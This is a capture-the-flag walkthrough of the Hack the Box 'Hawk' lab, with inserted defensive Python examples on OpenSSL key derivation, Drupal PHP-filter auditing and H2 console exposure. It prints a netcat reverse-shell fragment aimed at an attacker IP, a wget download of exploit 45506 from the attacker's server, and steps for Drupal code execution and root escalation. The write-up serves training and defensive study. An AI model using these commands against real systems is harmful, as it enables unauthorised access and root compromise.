Hack the Box: Hawk Walkthrough

Today we are going to solve another CTF challenge, “HawkNew”. HawkNew is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are available online, they have static IPs. The IP of HawkNew is 10.10.10.102

Penetration Methodology:
§  Port scanning and IP discovery
§  Anonymous FTP Login
§  Checking file type
§  Getting Login Credentials
§  Browsing IP through port 80
§  Exploiting Drupal
§  Reading First Flag User.txt
§  Getting Login Credentials
§  Spawning TTY Shell
§  Searching exploit via Searchsploit
§  Getting root Access
§  Reading Final Flag Root.txt

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and running services.

nmap -A 10.10.10.102

The Nmap output shows several open ports: 21 (FTP), 22 (SSH), 80 (HTTP, serving Drupal CMS) and 8082 (H2 database web console).



From the Nmap scan output we saw that FTP port 21 is open, and the next thing that catches our eye is that anonymous login is allowed.

ftp 10.10.10.102

We easily connected to FTP through anonymous login. After navigating through several directories we found a hidden file, “.drupal.txt.enc”, and transferred it to our local machine.



Since .drupal.txt.enc is encrypted, let’s check the file type using the ‘file’ command.

file .drupal.txt.enc

It came out to be OpenSSL-encrypted data with a salted password. Clearly we need to decrypt the file to get any further clue.




To crack this file we used an OpenSSL brute-force tool that is easily available on GitHub. You can download it from the link below, or run the following commands to download it and execute the script.

git clone https://github.com/deltaclock/go-openssl-bruteforce.git
./openssl-brute --file /root/.drupal.txt.enc

Boom!! We have successfully cracked the file, and the password hint we got is “PencilKeyboardScanner123”; this could be the password for the CMS login. Let’s check it.
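The reason a brute-force tool works here is worth seeing in code. The following is an added example, not code from this write-up or from go-openssl-bruteforce: it parses the legacy `openssl enc` "Salted__" layout that the `file` command recognises, re-implements OpenSSL's old EVP_BytesToKey derivation beside the PBKDF2 derivation that `openssl enc -pbkdf2` uses, and measures how many legacy guesses fit in the time of one PBKDF2 guess. The sample blob and passphrases are constructed; the real .drupal.txt.enc is not reproduced.

```python
"""Added example (not code from the write-up or from go-openssl-bruteforce):
inspect a file in the legacy `openssl enc` salted format and show why the
passphrase is the only thing protecting it.  All sample bytes are constructed."""
import hashlib
import os
import time

SALTED_MAGIC = b"Salted__"


def parse_salted_header(blob):
    """Split a legacy OpenSSL salted blob into (salt, ciphertext).

    Layout: 8-byte magic "Salted__", 8-byte random salt, then ciphertext.
    This header is what `file` keys on when it reports
    "openssl enc'd data with salted password".  Returns None otherwise.
    """
    if len(blob) < 16 or not blob.startswith(SALTED_MAGIC):
        return None
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, key_len=32, iv_len=16, md=hashlib.md5):
    """Legacy EVP_BytesToKey, OpenSSL's default KDF before `-pbkdf2`.

    D_1 = H(password || salt), D_i = H(D_{i-1} || password || salt);
    key || iv is the concatenation.  There is no iteration count, so one
    guess costs only a handful of hash calls.
    """
    derived = b""
    prev = b""
    while len(derived) < key_len + iv_len:
        prev = md(prev + password + salt).digest()
        derived += prev
    return derived[:key_len], derived[key_len:key_len + iv_len]


def pbkdf2_key(password, salt, iterations=10000, key_len=32, iv_len=16):
    """What `openssl enc -pbkdf2` derives instead (SHA-256, 10000 iterations by default)."""
    derived = hashlib.pbkdf2_hmac("sha256", password, salt, iterations,
                                  key_len + iv_len)
    return derived[:key_len], derived[key_len:]


def guess_cost_ratio(password=b"correct horse", salt=b"\x00" * 8, rounds=200):
    """Rough wall-clock cost of one PBKDF2 guess relative to one legacy guess.

    Not a benchmark; it only makes the point that the legacy KDF hands a
    brute-forcer thousands of tries for the price of one PBKDF2 try.
    """
    start = time.perf_counter()
    for _ in range(rounds):
        evp_bytes_to_key(password, salt)
    legacy_per_guess = (time.perf_counter() - start) / rounds

    pbkdf2_rounds = max(rounds // 50, 1)
    start = time.perf_counter()
    for _ in range(pbkdf2_rounds):
        pbkdf2_key(password, salt)
    pbkdf2_per_guess = (time.perf_counter() - start) / pbkdf2_rounds
    return pbkdf2_per_guess / legacy_per_guess


def describe(blob):
    """Summarise a blob the way an analyst would before deciding whether
    guessing the passphrase is even the right approach."""
    parsed = parse_salted_header(blob)
    if parsed is None:
        return {"openssl_salted": False}
    salt, body = parsed
    return {
        "openssl_salted": True,
        "salt_hex": salt.hex(),
        "ciphertext_len": len(body),
        # CBC modes produce whole 16-byte blocks
        "block_aligned": len(body) % 16 == 0,
    }


if __name__ == "__main__":
    # Constructed sample: header + fixed salt + 32 bytes of dummy ciphertext.
    sample = SALTED_MAGIC + bytes(range(8)) + os.urandom(32)
    print(describe(sample))
    key, iv = evp_bytes_to_key(b"weak", bytes(range(8)))
    print("legacy key", key.hex()[:16], "... iv", iv.hex()[:16], "...")
    print("one PBKDF2 guess costs about %.0f legacy guesses" % guess_cost_ratio())
```

The takeaway for anyone producing such files: a short dictionary passphrase is recovered in seconds regardless of the cipher, and `openssl enc -pbkdf2 -iter 100000` with a long random passphrase is the fix, not a stronger cipher.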



As port 80 is running an HTTP server, we open the target machine’s IP address in our browser and find a Drupal login page. To log in we used the basic username admin and the password PencilKeyboardScanner123.


Oh yeah!! We have successfully logged into the admin dashboard. Now go to Modules and enable the checkboxes for Path and PHP filter.





After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Give any title to your malicious page.
Here we have written a one-liner PHP reverse shell taken from the Pentest Monkey website.

&1|nc 10.10.14.10 1234 >/tmp/f"); ?>

Then select the Text format “PHP code”. Before saving the page, start a netcat listener on the chosen port, so that a reverse connection is established as soon as the code executes.
nc -lvp 1234




We got a reverse connection from the victim’s machine on our netcat listener. To spawn a proper shell we used the python3 pty one-liner.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Inside /home/daniel we found the user.txt flag; now it is time to find the root flag. While exploring the directories we read the contents of the “settings.php” file and found the password: drupal4hawk
cat settings.php | grep Password


Then with the following command we switch user and log in as daniel.
su daniel
Password: drupal4hawk
After su we land in a Python 3 interpreter instead of a shell, so we used simple Python 3 commands to escape it.
>>> import pty
>>> pty.spawn('/bin/bash')
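Two conditions made the Drupal part of this chain possible: the PHP filter module was enabled, so any account that can author content with the "PHP code" text format can execute arbitrary PHP, and settings.php handed the database password to whoever got a shell as the web user, a password that was also reused for an OS account. The following is an added example, not code from this write-up or from Drupal: a small audit that flags both conditions. Since it cannot query a live site, it runs over constructed rows shaped like Drupal 7's `system` and `field_revision_body` tables and over a constructed settings.php written to a temporary directory; the module machine name `php` and the text format name `php_code` are Drupal 7 core's.

```python
"""Added example (not code from the write-up or from Drupal): flag the two
Drupal 7 conditions this attack chain relied on, over constructed data."""
import os
import re
import tempfile

# Core module whose machine name is 'php' (shown as "PHP filter" in the UI).
RISKY_MODULES = {"php": "PHP filter: lets content authors run arbitrary PHP"}

SAMPLE_SYSTEM_ROWS = [  # constructed, mimics SELECT name, type, status FROM system
    {"name": "node", "type": "module", "status": 1},
    {"name": "path", "type": "module", "status": 1},
    {"name": "php", "type": "module", "status": 1},
    {"name": "bartik", "type": "theme", "status": 1},
]

SAMPLE_REVISION_ROWS = [  # constructed, mimics field_revision_body
    {"nid": 1, "body_value": "<p>Welcome</p>", "body_format": "filtered_html"},
    {"nid": 7, "body_value": "<?php echo 1; ?>", "body_format": "php_code"},
]

SAMPLE_SETTINGS = """<?php
$databases = array('default' => array('default' => array(
  'database' => 'drupal', 'username' => 'drupal',
  'password' => 'EXAMPLE-DB-PASSWORD',  // constructed placeholder
  'host' => 'localhost', 'driver' => 'mysql',
)));
"""


def enabled_risky_modules(system_rows):
    """Names of enabled modules that grant code execution to content editors."""
    return sorted(
        r["name"] for r in system_rows
        if r["type"] == "module" and r["status"] == 1 and r["name"] in RISKY_MODULES
    )


def php_format_content(revision_rows):
    """Node ids whose body uses the PHP format or carries an opening PHP tag.
    Checking revisions (not just current bodies) catches code that was
    saved and later edited away."""
    hits = set()
    for r in revision_rows:
        if r["body_format"] == "php_code" or "<?php" in r["body_value"]:
            hits.add(r["nid"])
    return sorted(hits)


def settings_php_findings(path):
    """Flag permissive modes on settings.php and note the clear-text DB password."""
    findings = []
    mode = os.stat(path).st_mode & 0o777
    if mode & 0o004:
        findings.append("world-readable (mode %o)" % mode)
    if mode & 0o022:
        findings.append("group- or world-writable (mode %o)" % mode)
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    m = re.search(r"'password'\s*=>\s*'([^']*)'", text)
    if m and m.group(1):
        findings.append("database password present; check it is not reused for OS or SSH accounts")
    return findings


def write_sample_settings(mode=0o644):
    """Write the constructed settings.php to a temp dir with the given mode."""
    path = os.path.join(tempfile.mkdtemp(), "settings.php")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_SETTINGS)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    print("risky modules enabled:", enabled_risky_modules(SAMPLE_SYSTEM_ROWS))
    print("nodes with PHP bodies:", php_format_content(SAMPLE_REVISION_ROWS))
    print("settings.php:", settings_php_findings(write_sample_settings()))
```

On a real site the rows come from `SELECT name, type, status FROM system` and `SELECT nid, body_value, body_format FROM field_revision_body`, and the path is sites/default/settings.php; Drupal's own recommendation is mode 0440 owned by the deploy user and readable by the web server group.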


From the Nmap scan output we noticed that an H2 database is running on port 8082, so we search for an H2 database exploit in searchsploit.
searchsploit H2 database
It came out to be a remote code execution exploit. The exploit we used is highlighted; we copied the exploit 45506.py into the /root directory and started a Python web server to download the file onto the target machine.
searchsploit -m 45506
python -m SimpleHTTPServer 8080



Afterwards we downloaded our exploit 45506.py into the /tmp directory of the target machine, gave it full permissions and executed it with the following commands.
cd /tmp
wget http://10.10.14.10:8080/45506.py
chmod 777 45506.py
python3 45506.py -H 127.0.0.1:8082
id
Finally!! We have got root access. Now let’s go and get root.txt. We take a look at the content of the file and find our final flag.
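The last step worked because an H2 web console was listening and the H2 process ran as root, so anyone who can reach the console and define functions in it inherits root. The following is an added example, not code from this write-up, from H2 or from exploit 45506: a defender-side check that parses an `.h2.server.properties` file for the settings that expose the console (`webAllowOthers`, `webSSL` and the process owner) and scans a list of SQL statements for user-defined functions compiled from inline Java source (`CREATE ALIAS ... AS $$ ... $$`), which is the capability a console user can turn into code execution. Both inputs are constructed samples; the uid argument is an assumption standing in for whatever the process supervisor reports.

```python
"""Added example (not code from the write-up, H2 or exploit 45506): audit an
H2 web console's exposure and flag inline-source function definitions."""
import re

# Constructed copy of the kind of file H2 writes to ~/.h2.server.properties
SAMPLE_PROPERTIES = """#H2 Server Properties
webAllowOthers=true
webPort=8082
webSSL=false
tcpAllowOthers=false
"""

SAMPLE_STATEMENTS = [  # constructed console statements
    "SELECT * FROM INFORMATION_SCHEMA.TABLES",
    "CREATE ALIAS HELLO AS $$ String hello(String n) { return \"hi \" + n; } $$",
    "create or replace alias greet as $$ String g() { return \"x\"; } $$",
    "CREATE ALIAS SQRT_ALIAS FOR \"java.lang.Math.sqrt\"",
]

# Matches aliases whose body is compiled from source supplied in the query,
# as opposed to FOR "some.existing.Class.method" references.
INLINE_ALIAS = re.compile(
    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?ALIAS\b.*?\bAS\s+\$\$", re.I | re.S
)


def parse_properties(text):
    """Minimal Java .properties reader (key=value, '#' comments)."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    return props


def console_exposure(props, runs_as_uid):
    """Findings that make an exposed console a root-level problem."""
    findings = []
    if props.get("webAllowOthers", "false").lower() == "true":
        findings.append("web console accepts connections from other hosts (webAllowOthers=true)")
    if props.get("webSSL", "false").lower() != "true":
        findings.append("web console served over plain HTTP (webSSL=false)")
    if runs_as_uid == 0:
        findings.append("H2 process runs as root; any console code execution is root code execution")
    return findings


def inline_java_aliases(statements):
    """Statements that define functions from inline Java source."""
    return [s for s in statements if INLINE_ALIAS.search(s)]


if __name__ == "__main__":
    props = parse_properties(SAMPLE_PROPERTIES)
    for finding in console_exposure(props, runs_as_uid=0):  # uid 0 is an assumption
        print("exposure:", finding)
    for stmt in inline_java_aliases(SAMPLE_STATEMENTS):
        print("review:", stmt)
```

The fix on the server side is the mirror image of the findings: run H2 under a dedicated unprivileged account, keep `webAllowOthers=false` (or bind the console to localhost behind an authenticated proxy), and treat any `CREATE ALIAS` with inline source in the query log as an event worth a ticket.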





Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here
